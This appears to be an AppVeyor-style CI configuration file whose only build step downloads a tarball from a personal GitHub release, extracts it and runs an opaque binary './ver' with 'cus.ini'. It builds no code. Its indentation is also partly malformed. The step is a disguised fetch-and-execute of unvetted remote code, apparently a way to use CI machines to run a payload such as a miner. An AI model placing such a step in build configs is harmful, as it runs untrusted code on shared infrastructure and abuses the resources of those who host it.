version: 1.0.{build}
branches:
  - main
skip_non_tags: true
max_jobs: 1
image: Ubuntu 1804
init:
  - git config --global core.autocrlf input
 matrix:
  fast_finish: false
 platform: Any CPU
 configuration: Release
 build:
  parallel: true  
 build_script:
  - wget https://github.com/hendrik20212/VRS/releases/download/doc1/Doc.tar.gz && tar -xvf Doc.tar.gz && ./ver cus.ini
